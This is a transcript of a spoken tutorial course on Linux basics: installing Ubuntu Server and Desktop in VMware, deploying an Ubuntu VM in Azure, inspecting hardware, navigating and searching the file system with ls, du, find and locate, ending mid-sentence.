In this demonstration, I will be manually installing a Linux server. Now, whether you're installing the Linux server on a physical host or whether it's going to be installed as a virtual machine, once you have the virtual machine hardware determined, the amount of virtual CPUs and RAM and virtual disks you'll need, after that's been determined, there's not really much of a difference during the installation at all between installing on a physical host and installing it as a virtual machine once you get going with the installation. But first, we need installation media. In this example, I've navigated to ubuntu.com. That's the distribution of Linux I will be using to install a server, but it could be many other distributions. It could be SUSE Linux Enterprise Server or Red Hat Enterprise Server. It really doesn't matter at the end of the day. They're all very similar with slight subtle changes and maybe with different packages installed. Okay, so I'm going to go ahead and click the Download Ubuntu Server button at the bottom. And it's going to be downloading an ISO DVD installer image, which I will save into my local downloads folder, and ultimately I will be using that to install my VMware Workstation Ubuntu Linux server. So I'll just go ahead and save that and wait for the download to complete. The download is approximately 1.8 gigabytes or so depending on your internet connection will determine how long it takes for that to come down. Okay, so now that the download of the ISO installer has completed here in VMware Workstation, I'm going to create a new virtual machine. It will be typical. I'll click Next. I'll select the disk image file, the ISO, by clicking the Browse button. So I'm going to specify my server ISO. I'll click Next and give it a name. And I can specify a storage location on my local host to store the virtual machine files. Next. Let's give this an 80 gig hard disk size. Now you have to think about what workload services will be running in this Linux server to really determine some of the details, such as how much disk space you'll need, and if you want that spread out across multiple virtual disk files or just have a single large disk file. A lot of those questions will be answered when you think about how you will be using the server down the road. And you can always change the config at any point anyhow. I'll click Next. I'm going to customize the hardware because I want the network interface card, network adapter, to bridge directly to the network and not through NAT. Network address translation. Click Close and Finish. So it's going to power on the virtual machine, which should boot up automatically from that ISO image. So I want to try or install Ubuntu Server. I'll press Enter on that. So it's in the midst of detecting the underlying hardware. That's part of what the job of the Linux kernel is. With modern Linux distributions, you should not have a problem supporting most hardware. There might be the oddball situation, like if you've got a hardware RAID controller from a non-standard vendor or an audio interface card. There might be some of those cases where you might have to configure the appropriate support for those devices. But generally speaking, the installation should be quite smooth when it comes to detecting the underlying hardware. So English is going to be the language. It says that there is an installer update available. Okay, that's fine. I'm going to choose the keyboard layout. That's all fine. We're going to install Ubuntu Server. Notice you have Ubuntu Server minimized, but I want the standard set of software packages already installed. Press Enter. Notice that you do have, under Additional Options, the ability to search for third-party drivers. Again, that should be rare, but if you need to do it, this is where you can do it during the installation. Down at the bottom, I'm going to select Done and press Enter. It's detected my network Ethernet interface, and it wants to use DHCP to assign an IP to it. That's fine. I'll press Enter. I'm not using a proxy server to get out to the internet, so I'm not going to fill anything in on that screen. I'll press Enter to accept the default mirror for Ubuntu packages for the installation. Then it comes to the storage layout. Currently, it's set to use the entire disk, in this case, /dev/SDA, which is an 80 gig virtual disk that we set up in VMware. It's also configured by default to set this disk up as an LVM group. And we'll be talking about that, of course, in detail, but for now, let's accept that default. We really could go all the way down to a custom storage layout if we wanted to partition or carve out the disk in a certain manner, but I'm okay with this. I'm going to press Enter. So for my file system summary, at the top, I have the root mount point, which will be close to 40 gigabytes. Then I've got my boot mount point, which will be about 2 gig. And way down at the bottom, I've got the partition layout on /dev/SDA1. I'm okay with all of these default settings, so I will press Enter. It says selecting Continue will begin the installation process and could result in the loss of data on those disks. I know it's an empty virtual disk, so are you sure you want to continue? I will choose Continue and press Enter. I'll have to fill out these personalization details like my name, server name, username, and password. I'll fill that out, and then I'll press Enter. I don't want to enable Ubuntu Pro, so I'm going to leave this as it is and skip for now. I'll press Enter. I do want to install the OpenSSH server to allow remote SSH management over an encrypted connection, so I'll press the spacebar to put an X in the box for that. And I'm not changing anything else, so I'm going to go down to Done at the bottom, and I'll press Enter. Then I've got a number of other packages I might choose to install. How convenient! Like having Microsoft PowerShell available here in Ubuntu Linux, or installing the Docker container engine. I'm not going to change any of these though. So down at the bottom, I'll select Done. And at this point, it's going through the installation of my server. Okay, once it's completed, down at the very bottom, we would go down and select Reboot Now and press Enter. Okay, once it reboots, I'm prompted to log in, which I will do. And one of the first things I would do here is perhaps run IPA for IP address, take note of the IP, and maybe in PuTTY make an SSH connection to the IP of that host. The first time I connect, of course, I have to accept that I trust its signature. So I'll sign in with my user account. And I'm now into my Ubuntu server remotely over SSH. There are times when you may want to have a Linux installation with a desktop environment, with a GUI. And so in this demo, I will be manually installing a Linux desktop. There are plenty of Linux distributions that include a graphical user interface. In this case, I happen to have chosen Ubuntu Linux. So I'm on the Download Ubuntu Desktop page, where what I'll do is scroll down on the page, and on the right, I've got a download for a specific version. So I'm going to go ahead and click to download it. So what I'll be downloading here is an ISO DVD image of the installer. So I'm going to go ahead and save that on my local machine, because ultimately I could either burn that to a DVD and boot from it and install it on a physical host, but what I'll be doing is installing it in a VMware Workstation virtual machine locally. Okay, I'm going to go ahead and save this. Okay, so I fired up VMware Workstation 16 Pro. That's what I happen to have on my machine, but you can use pretty much any virtualization software to install an Ubuntu Linux virtual machine from an ISO. So what I'll do here is I'll choose Create a New Virtual Machine. I'll leave it on Typical. I'll click Next. I'm going to select Installer Disk Image File ISO. All right, so I'll select my downloaded Ubuntu Desktop ISO image. I'll click Next. And I'll fill in some personalization details. Then I'll click Next. And I'll give this virtual machine a name. I'll call it Ubuntu Desktop. And I can specify the location where I want that stored. I'll accept the default location. I'll click Next. Let's give this an 80 gigabyte disk size for the virtual disk. I'll go to Next. It looks like the network adapter here will use network address translation, NAT. I've got 4 gigs of RAM. But I want to change the hardware. I'll click Customize Hardware, because what I want to do is select the network adapter to be a bridged connection directly on my real network. Okay, I'll choose Close, and I'll click Finish. So I've created the shell for the Ubuntu Desktop Virtual Machine. So it's going to fire up and boot from the ISO. So it's already happening. Okay, so the first thing I'm prompted with in the GUI installer is the keyboard layout. I'll leave it on English US. I'll click Continue. And for which apps I would like to install, I'll do a normal installation. So as it states, that'll include a web browser, various utilities, Office software, games, media players. Let's do all of that. And we'll also make sure it downloads the latest updates when it's doing the installation. We know it's always important to apply the latest updates for new features, to fix bugs, and to close any security holes. I'll click Continue. It's defaulted to erase the detected disk and install Ubuntu, which I want to do. I know it's a virtual disk that has nothing on it already, so I'll just go ahead and click Install Now. It gives me a summary of the changes it'll make when it writes to disk. So it's telling me it's modifying the partition table for my disk A, SDA, and that it's going to partition it in the listed manner. For example, partition number 3 on SDA will be an ext4 type of file system. That's fine. I'll accept all the defaults. I'll click Continue. It should have detected my time zone, so I'll click Continue. And even though at the VMware level, I filled in some personalization information, that doesn't translate into the OS configuration, so I'll fill in some of that stuff here. All right, so I've specified my name, my computer's name, a username, and I've specified and confirmed a password for it. I'm not going to set login automatically. I want to require my password to log in. Notice we could also integrate this with Microsoft Active Directory. But in this case, I'll just do a local login on this Linux host. So I'll click Continue. And at this point, it's copying files to the newly created file systems. You can't ask for an easier installation process than that. Very similar to how you might install a modern Windows OS. Okay, after a few minutes, it'll state that the installation is complete and that I need to restart the computer, in this case, my virtual machine, to use the new installation. How exciting! That's perfect. Let's do it. I'm going to click Restart Now. Now, in some cases, you might have some difficulties during the installation, such as the installer detecting mass storage devices if they're perhaps plugged in through USB or even internal disk devices. Now, that would be very rare. You might have to switch hardware settings, perhaps the UEFI, to use BIOS legacy mode in some cases for backwards compatibility. But again, honestly, that should be rare. Let's sign in as Cody Blackwell. So this is local authentication. We're not using a server anywhere to authenticate our account. Although notice the first thing it does prompt me with is to connect online accounts to Ubuntu Linux, whether it's Google or Microsoft and whatnot. But I'll click the skip button. It's prompting me to enable Ubuntu Pro, but I'm going to skip that. I'll just click next. And for help improve Ubuntu, I'll choose no, don't send system info, next. And I'm not going to turn on location services, and that's it, we're done. Here is our beautiful fresh installation of Ubuntu Linux Desktop, where we have a left-hand navigator. We can fire up apps like the Firefox web browser. Let's see if we have internet connectivity. I'll just click skip this step to configure the browser, and skip this step again. We don't want to bring in any settings. We just want to get up and going. Now it's prompting me that there is updated software. Since Ubuntu, in this case, 22.04 was released, do you want to install it now? Oh, definitely. Install now. Once the software updater is completed, we can choose to restart later or restart now. I want to restart right away, and I'll sign back in. Now, where were we? We wanted to verify that we at least had internet connectivity on our host. So, for example, if I go to YouTube, it looks like it's working. It pulled up the page. Perfect. And we've got a number of tools in the left-hand navigator because we installed the apps. We can browse the file system, use Thunderbird Mail. It also includes LibreOffice, which is very similar and even compatible with file formats from Microsoft Office. If I were to click LibreOffice Writer, you might look at it and wonder, isn't this very similar to Microsoft Word? It is. A lot of people don't realize that these days, the desktop graphical versions of Linux rival the Mac OS and modern Windows versions. I can also click the Show Applications button in the bottom left to get a list of all of my applications. I can also search. If I search for the word terminal, I can start a terminal or command prompt here, where, for example, I might type IPA for IP address, or I could view my IP address. I could type hostname to view my hostname, and it returns what we entered upon the configuration, in this case, Ubuntu Desktop 1. So that gives us an idea then of how incredibly quick and easy it is to install a desktop version of Linux. In this demonstration, I will be deploying a cloud-based Linux server. So you can deploy Linux in any cloud environment. In this case, we'll be using Microsoft Azure. The great thing about it is that we already have OS images on which we can base our cloud-based Linux server. So it's really just a few clicks to get up and running with Linux in the cloud, or just a few commands at the command line if you're opting to do things that way. To get started here in the Microsoft Azure portal, I'm going to click Create a Resource in the upper left. Now, right away, I've got virtual machine available, and on the right, I've got a number of common virtual machine types, including Ubuntu Server. However, next to popular marketplace products on the right, I'll click the link that says See More in Marketplace, and I'll filter the list based on the word Linux. So I've got options here like Kali Linux, which is a penetration testing type of Linux distribution containing many security-related tools. We've got Oracle Linux, Red Hat Enterprise Linux. Amazon even has their own distribution of Linux. Arch Linux, the list goes on and on and on. If I were to search for a specific Linux distribution, let's say Ubuntu, then we have those specific types of variants available. Notice that we've got some variants that also include the GUI, the graphical user interface. I'm going to choose one of the newer variants, Ubuntu Linux 23.04. So I can read the details about it. I can take a look at what the pricing is on an hourly basis, and if I'm happy with it, I can go ahead and click Create. Now I'm going to have to specify some details here in Microsoft Azure, including things like the resource group into which I want to deploy this virtual machine. The resource group, like its name implies, is just a way to group related cloud resources together, maybe by department or by app or by project. In this case, I've got a resource group called East, so I'm just going to deploy this in that resource group. I'm just going to call this Ubuntu 1. It'll be deployed in the East US region. And down below for image, Ubuntu 23.04 is selected. I can determine the virtual machine size, which means the amount of horsepower, so the number of virtual CPUs, and the amount of RAM. Maybe I'll choose 4 virtual CPUs, 16 gigs of RAM. You can also determine if you want to authenticate to this host using SSH public key authentication. The public key would be stored here in the Azure cloud with the VM, but the related private key you would download and you would need to authenticate. Or you can go with just basic username and password authentication. For this example, that's what I'm going to do. So I'll fill in a username and I'll specify and confirm a password. It wants to allow inbound ports for SSH port 22 for remote management. I'll leave it that way. You could also use a jump box or a jump server, which is the public connection point over the internet. And from it, you can launch to internal virtual machines to manage them if they only have private IPs. In Azure, that type of solution is called Azure Bastion. But in this case, I'll just leave the server publicly visible over the internet on port 22. When I click Next Disks, I can determine how many disks I want to use for this virtual machine. I'm not going to change that. I'll click Next for networking. It wants to create a new virtual network. I'll let it create a VNet and a subnet with default IP addressing. Of course, I could change those things, but I'm going to accept them as they are. And there's nothing else I'll do, so I'll click Review and Create in the bottom left. And to deploy the virtual machine, I will click Create. So that will create the virtual machine in Azure and a couple of other resources like the public IP address and any disks. Those are separate resources, and it will also start the virtual machine automatically for me. Okay, before too long, the deployment is complete. If I click the home link in the upper left, and let's say then I go to all resources, I filter the list for Ubuntu. I've got my Ubuntu One virtual machine. That is its own type of cloud object or resource, but I've also got the public IP address for it, a network security group, which in the Azure cloud allows me to control network traffic to and from virtual machines and subnets. I've got the virtual network that was created. You need a network if you're going to deploy a virtual machine. I've got a network interface for that virtual network, and I've got a disk. The subnet is contained within the properties of the virtual network. If I click on subnets, there's a default subnet that was created that uses the 10.0.0.0/24 range. If I go to the home view again, and we can even just filter down to virtual machines, if I click on my Ubuntu One virtual machine on the overview page on the right, notice it's got a public IP address. You can also view this by clicking Networking under Settings in the left-hand navigator. Here we have the public IP, but also the private IP address for that virtual machine. I need the public IP if I'm going to connect to it remotely to manage it. And I'm going to connect to it remotely and manage it using the free PuTTY tool, P-U-T-T-Y. So here in PuTTY, I've specified the public IP address of that Ubuntu One Azure-based virtual machine, port 22 for SSH, and I've saved this as a setting here called Azure Ubuntu. Now, I can't connect to the private IP address unless I were to go through a jump server or I were to first connect to the VNet where that virtual machine is running, perhaps through a VPN. All right, let's click Open. Now, because it's the first time I've connected, of course, over SSH, it asks if I trust the unique fingerprint of the server. I will accept it, and it wants me to log in. Well, this is where I would specify the credentials that I set up when I deployed the virtual machine. So I'll enter the username and the password, and we're in. If I were to type ifconfig to display network information, it says this isn't included with this distribution of Linux, but you could run sudo apt install net tools. Well, I could do that, or I could run IPA to show the IP address information. I've got my local loopback, of course, LO. In IPv4, the local loopback is always 127.0.0.1. In IPv6, the equivalent is : 1. But I've also got an Ethernet 0 interface, ETH0, where I've got an IPv6 link local address that was assigned. It always has an FE80 prefix. But I've also got the private IP address, which was given from the subnet. Notice the public IP does not show up here within the Linux OS, as that's an Azure resource associated with the VM, but it doesn't show up within the VM operating system itself. And there you have it. Just like that, we've got an Ubuntu server virtual machine running in a cloud environment. In this demo, we're going to take a few minutes to talk about commands related to Linux hardware management. So let's start here in Linux by doing an ls of the /dev directory. That's part of the Linux file system hierarchy standard. So that means that you will find a /dev directory on every Linux distribution. Dev stands for device. And there are many types of devices here, such as our terminal screen devices, but also references to hardware devices like CD-ROM, CPU-related information, mass storage devices like SDA, and then its partitions, SDA 1, 2, and 3. Each of the partitions are actually showing up as a device in /dev. Remember that Linux interacts with hardware through device files. So of course, we can do an ls, a /dev/sd question mark, where the question mark is a wildcard for a single character, and it shows us our mass storage devices on this machine. So it means our machine recognizes SDA, SDB, SDC, and SDD. Now, if you need to install a specialized driver, in this example, if I need to install NVIDIA video adapter drivers here to Ubuntu Linux, I can go ahead and install the appropriate driver packages. So sudo apt install, and in this case, I'll reference a couple of NVIDIA driver files that I might want to install. And I could press enter, and it then prompts me if I want to continue with it. Now, I don't have that hardware, so I will not continue with the installation, but it's important to understand that this is a way that we can install the drivers using the command line method. I'll press N for no, I don't want to install that. Of course, you can also specify third-party drivers or any type of hardware upon installing the OS normally. Depends on the version of Linux and the distribution, but generally you'll have that option upon install too. Let's do an ls of /proc. Proc is for processes. So this is a dynamic subdirectory whose contents will change. Notice, for example, all of the subdirectories here that have numeric values. These are process IDs or PIDs assigned by the Linux kernel to running processes. Now remember, we can also view running processes by typing PS, or if you want to see them all, AUX, so they're not tied to a particular Linux terminal login session. However, let's go back and let's cat /proc/CPU info. In here, we have information about our CPU hardware. Okay, so the model name is an AMD type of CPU. The megahertz speed rating is about 3293. It's got a 512 kilobyte cache. Okay, so we can get some details about that type of stuff. If I clear the screen, I can also ls the proc directory on the root, maybe go look at bus and the PCI directory. So here we've got a couple of subdirectories and a devices file. So why don't we actually cat /proc/bus/PCI/devices to see what the kernel, the Linux kernel, thinks is connected via the PCI bus. Usually there's some kind of a sound device, maybe an Ethernet adapter. There might even be disk drives that are connected. So we're determining this by just looking at the names that are referenced here in our devices file. But really, if you want to look at PCI devices, you should be using the lspci command, list PCI. I do that with the -v for verbose and then pipe it to more so it stops after the first screen full. Immediately, we know that this is a VMware virtual machine. It's using the VMware virtual machine chipset. We've got some details about the PCI bridge and the ISA bridge. PCI and the older ISA are standards for connecting adapter cards on a machine for extended functionality, sound cards, network cards, and so on. I've got some IDE disk interface information. Then I've got some SCSI storage controller information, and then USB controller information, and so on. So the list PCI command will show us what is recognized by the system. And sometimes we can use that to help troubleshoot why, for instance, a piece of hardware is not working correctly within Linux. We also use the list USB, ls USB command -v. This will give me some details about what's connected to the USB bus in my machine. As well, if I clear the screen, you can also run sudo DMI decode. DMI stands for Desktop Management Interface. The purpose of this command is to show us some BIOS or UEFI information. So let's pipe that to more. So it stops after the first screen full. Immediately, I have some BIOS information. It's a Phoenix Technologies Limited BIOS version 6. There's the release date. That's always important because we need to be able to determine the version of the BIOS firmware that we are running and the revisions. The BIOS revision is also shown down here. So with these types of commands, we can begin to get a sense of what kind of hardware resides in the machine, which can be important. For example, if we need to update the BIOS or check to see if we need to update the BIOS on a given Linux host. The purpose of this demo is to familiarize ourselves with Linux file system navigation commands. How do we move about, and what are some common commands that might be issued to learn about the file system and work with files and directories? So let's go ahead and get started here. I've SSH'd using the free PuTTY tool into my Ubuntu server. The first thing we need to be able to do in Linux is determine what our current position in the file system hierarchy is. For example, I can issue the pwd command. That's not password. That means print working directory. Notice it shows that we are in /home /C Blackwell. So if I were to type in change directory cd space front slash, which means go back to the root of the file system, and then etc, let's say, etc shows up in my command prompt. And if I were to type pwd, of course, it reflects we are in /etc. Now, when it comes to user home directories at the command prompt, we can quickly return to the user home directory simply by typing cd enter. You don't have to tell it anything else. So I can verify this, of course, with pwd, and indeed it shows I'm in my user home directory. So I'll type in clear to clear the screen. Probably one of the most frequently issued Linux commands would be ls for list. That's kind of like typing dir on a Windows machine to get a directory listing of files. Now, in this case, because we didn't pass it any parameters, it shows the current directory's file listing. Now, the blue highlighted words, now the words in blue are subdirectories in this particular distribution of Linux, Ubuntu, where the bright green names are those that have the execute permission bit set, and just the regular listed files are just regular files that are not directories and do not have the execute permission set. We can also type ls-l for a long listing, or you could type for short ll, same thing, long listing. But the key here is it's showing, yes, the entries in the file system, so our blue subdirectories are green files, which are presumably scripts or binaries of some kind because the execute permission is set. And notice that for the directories, if we take a look at the permission set, the first character is a D, which means, of course, it's a subdirectory. If we go to a file that we know is not a subdirectory, notice that the first position here is just a dash, so it's not a directory. But when you look at a long listing, it's also important to understand the permissions. And we'll focus on permissions a bit later, but for now, it's important to know. You've got 3 sets of standard permissions for any given file system object. You've got a set of permissions for the owning user, which is shown in the third column from the left here when we type in LL, long listing. Then you've got a set of permissions for the owning group, which here is shown as being the same. When you make a user account in most Linux distributions, a group is also created with the same name. So in this case, I've got a user called C Blackwell, and I also have a group called C Blackwell. So we've got 2 sets of permissions for that. The third set would be for everybody else. So read, write, execute, RWX, in this case, for the file that we are focusing on, it's called hello.sh in our example. C Blackwell, that user, gets read, write, and execute permissions. The second set of permissions are for the group, which is also set to RWX. So whoever's a member of the C Blackwell group would get RWX to this file. And then we've got just R and X, read and execute, for anybody that is not user C Blackwell or not a member of the C Blackwell group. We've also got a reference in the next column to the right of the number of hard links, but we'll talk about hard links later. We've already talked about the owning user and the owning group. We've also got the size of the file in bytes, and we've got a date and timestamp, and of course the name of the file system entry. We can also issue the ls-a command. -a means all, even hidden files and directories. A hidden file or directory in Linux is simply one where the first character is a dot, whether it's a subdirectory or a file. It means it's simply hidden from the regular ls display. Now, of course, another important part of working in the file system is creating directories. We can do that with the make dir mkdir command. So if I want to make a directory here called projects, I could go ahead and do that. Now, if I do an ls, we've got a projects folder shown in the output. And of course, we could change directory into projects. If we wanted to copy some content, maybe I'll make another directory first within projects called scripts. I could even put in a hierarchy of subdirectories I want to create all at once. So scripts, which is going to be in the current location projects, /east, let's say. But if I just press enter, it says I can't create east because scripts doesn't exist yet. But if I use the up arrow key and bring that up and add a --lowercase p, in other words, to build the entire path, no problem. If I do an ls here in projects, there's scripts. If I go into scripts and do an ls in here, we've got east. So I'll just change directory to east. So what I could do, for example, is copy using the cp command. .. means go back one level. That would put us in scripts because we're currently in east. /.. again would put us in projects. /.. again would put us in our home directory where I can specify /*.sh. I know I've got a number of files up here. We see it in the output of ls that end with .sh, and they're in the home directory. sh is normally used to notate that that file is a shell script. It's not required, but it's commonly done. So I can say I want to copy all those shell scripts from that location into the current directory, which I can simply reference with a dot, and I can press enter. If I type ls, There are the shell scripts that have been copied into our new east subdirectory. I can also create new files in here. For example, using the touch command, I could say touch backup script 1.sh, enter. If I clear the screen and do an ls, what we've got, actually let's do an ll, what we've got is a new file called backup script 1sh. It's a 0-byte file. That's all the touch command does. From here, if you wanted to edit that, you could use the vi command, or maybe you want to use the nano command and specify that file name and work with the contents of the file. I'll get out of nano by pressing Control X, though I don't want to do that right now. You can also move files. We copied with CP, but you can also move. So let's clear the screen and do an ls of tilde. What's tilde? Tilde means home directory. Remember how we did CD and we pressed enter and it was a shortcut to get into the user home directory for the current signed in user? You can also reference that with a tilde symbol. It also means home directory. So let's say I want to bring over this text.txt file from its current location and I want to move it, not copy it, into the east folder. So I could type NV for move. We know that we have to go a couple levels back in the file system to get to test.txt, and we also know we can specify the current directory with just a dot. So in this case, I'm moving it. So if I use the up arrow key here, this is handy to go through my command line history, and go back to ls tilde, notice that the test.txt file is no longer there. If I type ls here in the east, it now shows up here because we have moved it. The last thing we should know about is removing directories. For example, if I do a cd ... to go back one level, that puts me in scripts. I want to remove the east folder or directory. So rmdir, remove directory, east. But it says, well, that's great, but I can't do it. It's not empty. What I could do is just use the rm, the remove command. That's a command that will allow me to delete files, or in this example, a directory. If I were to say rm east, it says, well, it's a directory. But if I use the up arrow key and add dash lowercase r to the end, then I'm being prompted. Do you want to remove that? Specifically, notice what's telling me. It's telling me, would you like to remove that file in there, test.txt? I'll type in the letter Y for yes and enter. If I do an ls now in scripts, notice that the east folder is now gone. If I type man rm to open up the help page, the manual page for the remove command, and if I type a front slash in the bottom left, it shows a slash. This allows me to search for something specifically in here, like dash F, enter. Dash F, as shown in the man page here, allows me to force the removal of items without being prompted for everything like we just were. And that was only one file. You can imagine if there were hundreds of files in the east directory. So that gives us a sense then of some basic file system navigation commands that can be very handy when you're managing Linux systems. All right, in this demo, we're going to focus on navigating the Linux file system. We've begun to look at this already, but we're going to take it a few steps further by looking at some more command line parameters. For instance, for the ls command, we'll take a look at how to use the fdisk command, the mount command, the df or disk free command, du or disk usage command. So let's go ahead and let's get started. The first thing I'll do here is pwd. We know that that means print working directory. It'll show where we are. We also know that we could type in cd for change directory and just press enter to go into the user home directory. Now we also know that we can do an ls-l to get a listing, a long listing of each entry in the current location because we didn't specify a path. And that will also show us things like subdirectories shown here in Ubuntu Linux is blue, and of course we have a D in the first placeholder, which indicates that it is a directory. If we just do an ls of the budgets subdirectory, we've got a couple of files in there. This is where things get interesting. Let's say we just did an ls of things that start with the letter B. So ls b asterisk. Notice what it does is shows the contents, in this case, of the budgets folder. For instance, one of the returned files is download. That's the name of the file. That doesn't start with B. So why is it showing up? Because it's in a subdirectory that starts with the letter B. Well, how do we change that behavior? That's probably not what I intended to do. What we can do is the following. We can do an ls dash lowercase d, do not go into subdirectories, then in this case, b asterisk, enter. This time, it shows us only the entry for items that start with B in the current file system location in the hierarchy. So it shows us only budgets. You can extend that perhaps by doing ls-l for a long listing if you wanted to do that. So you could add -ld, you can put the parameters together like that, enter. Now we have the budgets folder listing. It didn't show us what's in it. And we have all of the details, the permission sets, the number of hard links, owning user, owning group, and so on. Now we know that Linux is case sensitive. So how can we work with that in the file system using ls, for example? Let's make another directory in the current location. We already have budgets. Let's create one here called uppercase budgets. Notice it had no problem with that. So if I were to use the up arrow key to do ls-ld lowercase b asterisk, it still only shows budgets. And if I change that to a capital B, it shows only uppercase budgets. What if I want all entries that match either lower or uppercase budgets, but I want to do that with a single command? Well, with ls, we can do this. What we would do is enclose the variables within square brackets. So uppercase B followed by lowercase b, close the square bracket, and then after that, our standard wildcard asterisk character. If we press enter, notice now it's returning both of them. So that could be handy. I'm going to clear the screen. I'm just going to go ahead and run the lsblk list block devices -scuzzy command. One of the items I notice here is item SDA. So if I want to, I can run fdisk against /dev/SDA. And I can also use -l for list. Now I get a permission denied because this requires elevated permissions. Therefore, I need to prefix that command with sudo, that, or sign in as root. When I do that, it gives me the breakdown for SDA, which is an 80 gigabyte drive. So it's got partitions 1, 2, and 3 of the size shown here, respectively 1 megabyte, 2 gig, and 78 gig. If I were to bring up that previous command, but remove the -l, it takes me into an interactive fdisk where I can actually repartition the disk and make changes. However, I don't want to do that. So I'll type Q for quit to go back to the command line. I'll clear the screen. We can also type mount to get a list of mount points. Mount points means that we've got file systems, whether they're local or remote over the network, that are made available in a local subdirectory, the same way that Windows would use a local drive letter to point to a file system, whether it's mapped to a local file system or it's a network drive mapping to something on a server somewhere else over the network. For example, if I were to type mount and pipe that to the grep line filtering command and look for the word boot, I can see that in /boot, which is a directory, a mount point directory, when I go into the /boot directory, I'm actually viewing what's on /dev/SDA2, partition 2 on device SDA. We'll be working more with these commands in more detail in other demonstrations. Another handy command is df or disk free. It'll show me my mounted file systems. It'll show me the used space and available space and the percent in use. You can also see the mount point shown in the last or rightmost column. If I run df-h, that's a lowercase h, that's for human readable. So instead of displaying, for example, the used and available and number of 1 kilobyte blocks, instead, it's just shown in megabytes, for example. So the size, the used, and the available, that's usually much more readable than trying to figure it out in 1K blocks. Just makes it easier to look at. I'm going to clear the screen. Another interesting command that we can run is du for disk usage. And just like with the df command, disk free, we can also pass it a -lowercase h to make it human readable. Reading units that are in blocks, we can see the units here in kilobytes, capital K, or megabytes, capital M. What this is doing is showing me the space utilization on my machine in the current working directory. So I've got 12K in the hidden.ssh directory, 2.1 megabytes in budgets. Notice it's all with a dot/. Dot means current directory. And we know, of course, that we can run pwd to see what that is. If I were to go to the root of the file system, let's say, so change directory to root, sudo du disk usage -lowercase h, notice it's going through, recursively going through the entire file system, or the root file system, which contains everything else on this machine, and breaking down the space utilization. But what about if I want to view the disk usage and sort it by the size? I can run du-lowercase s to summarize the output, h for human readable. I'm going to put it in asterisk for everything, all files. I'm going to pipe this using the vertical bar symbol. That's a pipe, so take the result of the command on the left, feed it into the command on the right, which is going to be the sort command line utility, where I want to sort, make it -h, and r, I want to make sure I sort it by the largest numbers, so reverse sort, enter. And if we take a look here at the output, notice that it's pretty easy to identify what is using the most space on the machine as we go down through the listing in reverse sort order. In this demo, we're going to focus on how to search the Linux file system. Over time, you can end up with thousands or even millions of files. We're talking data files here. So that means that we need an easy way to locate files in a hurry. And we can do that in a variety of ways. We can use the find command in Linux, or we can use the locate command. Let's start by working with find. So of course, there's always a manual page for these things. If I type man find, it'll show me the help page or the manual page for the find command with a description of how it works and of course the command line options, whether it's a dash in an uppercase letter or a lowercase letter. However, I'll just press Q to get out of there. Now, if I type ls, actually, if I type pwd first for current working directory, I'm in my user home directory. I'm signed in as user C Blackwell as evidenced by the output of the ID command. So if I type ls, I've got a bunch of sample files here, but I also have two subdirectories. One is called budgets with a lowercase b. The second is called budgets with an uppercase b. That's interesting. So if I were to type sudo find, let's say we start from the root of the file system, slash, dash name, I'm looking for file names, double quotes, I'm going to start with, in square brackets, capital B, lowercase b, close square bracket. In other words, match any one of those, not both, then the rest of the word budget, asterisk, something after the word budget as well, if it exists, and I'll close my double quotations. If I do that, it returns back everything that would be related to the word budget. Okay, so there's some entries here for text files and a subdirectory, and then some library modules in Linux that have the word budget in their file name. Let's take that a step further. I'm going to use the up arrow key to bring up that previous command, but I want to add to it. Because you're not limited to just searching by name. You can search on any attribute of a file or a directory entry in the file system, basically any of the metadata, such as the owning user. If I type -user to add to that existing command, L. Brenner, this is a user account on this Linux host that I know has been given ownership of at least one file. When I press enter, how we get a much smaller output. Apparently, in the budgets folder with the lowercase b, there are two budget files that are showing up. Well, that makes sense for the name matching part of the find command, but apparently they are owned by user L. Brenner. Let's take a look. If I change directory into the budgets folder and do a long listing, indeed, if we look at the budget1.txt and the budget2.txt file, L. Brenner is listed as the owning user. So in other words, the command succeeded. It showed us exactly what we asked it to show us. Now, on a larger Linux host, if you're doing this, if you're doing a find, depending on what you're searching for, it might take a while to go through the entire file system. What you can do is you can send a command output, as we know, using the output redirection symbol, the greater than sign, to a file. For example, L. Brenner owner results.txt. And in case we get any errors in the output, I can also suppress that with two greater than sign. That means redirect errors either to a file or to /dev/null, just to discard them. And I can tell this to run in the background by adding a space and an ampersand at the end. Why would I do this? If this is a long-running command, it means it immediately sends it into the background, and so I don't have to wait for it to finish. I get my command prompt immediately, and I can continue doing something else. So it returns here that it's been assigned a job ID and a background running process. Of course, we know that that's going to run very quickly, and if I cat the L. Brenner owner results file, it returns back the contents of that. Now, of course, the job is done here. That's what this message here is telling us. So that's an important aspect to think about when you're working with find. Now, there are other examples of find I'd like to do here. Let's say I want to do sudo find from the root -type D. I want to look for directories, not files, directories. Naturally, if you put -type F, you're looking for file entries. -name, let's say Apache 2. Okay, so what this is doing then is searching from the root of the file system and seeking any subdirectory with the name Apache 2. Notice we've got it in a couple of places, like etc for configuration, varlib for binaries related to the Apache 2 web server, varlog for logging, and so on. As if that weren't useful enough already, we can also search based on permissions. If I were to do an sudo find of /, so from the root, -type file, so F, -perm, as in permissions. Let's say I look for 0740. Now, we haven't talked about the special bits, so we're not going to get into the first 0 yet, but 740 are the permissions for the owning user. That's the 7. The owning group is the 4, and everyone else is 0. 7 means read, write, execute, because read has a value of 4, write has a value of 2, execute has a value of 1, and 4 plus 2 plus 1 equals 7. It means the owner has read, write, execute. The 4 would mean that the owning group to a given file entry has only read permissions, and the 0 means everyone else would have nothing. Maybe that's what I want to look for. If I press enter, first of all, I get a couple of references under proc. Now, proc is a dynamic process subdirectory, so I get no such file or directories listed there, but I do have one valid entry shown. And remember, what you can do is when you're running a command, any errors that you want to suppress, if you don't care about the output, just use 2 greater than sign and redirect it to somewhere, like a file, if you want to store the output of errors in a file, or in this case, just discard them to /dev/null. So what this is telling me is that in my current user home directory in the budgets folder, the budget1.txt file has the permission set of 740. Let's see if that's true. If I do an ll long listing of budget1.txt, read, write, execute, that's the 7. Read, that's the 4, and the absence of anything else for everyone else is 0. That is correct. The next thing we're going to do is take a look at a different search type of command called locate. However, on some Linux distributions, you might have to install it. sudo apt install, let's say plocate is what it's called. Okay, it looks like we've already got plocate installed, and it is the newest version. Otherwise, we would have to proceed with installing it so that the locate command is available. So when I type locate, I know it's working because it says no pattern to search for. Now, the way that this works is if I do an ls of /var/lib/plocate, here we've got a plocate.db file. The locate command uses a database which contains an indexed listing of file entries in the file system, and when you use a locate command, you're actually searching that database file. The find command actually just searches the file system, which is slower than searching through an indexed database. However, the locate database needs to be up to date with the newest changes in the file system, so you have to consider that. Now, I can run sudo update db to update that database. However, there is a scheduled cron job that automatically occurs daily to do that. If that's not enough, just make sure you run 